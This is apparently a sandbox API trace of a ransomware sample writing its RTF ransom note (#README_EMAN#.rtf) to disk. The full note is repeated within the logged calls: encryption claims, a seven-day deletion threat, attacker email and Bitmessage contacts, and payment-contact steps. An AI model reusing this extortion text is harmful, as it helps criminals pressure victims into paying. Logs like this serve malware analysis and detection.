emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476d68, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nV\x14vÇ/îÓ®÷¹1hºõÌ\x8fêr\x08?h\x9fÔ£\x04", lpUsedDefaultChar=0x0) returned 8717 [0207.980] WriteFile (in: hFile=0x2fc, lpBuffer=0x2476d68*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476d68*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0207.981] CloseHandle (hObject=0x2fc) returned 1 [0207.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\#readme_eman#.rtf")) returned 0xffffffff [0207.981] GetLastError () returned 0x2 [0207.981] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\management\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\management\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2fc [0208.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0208.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will 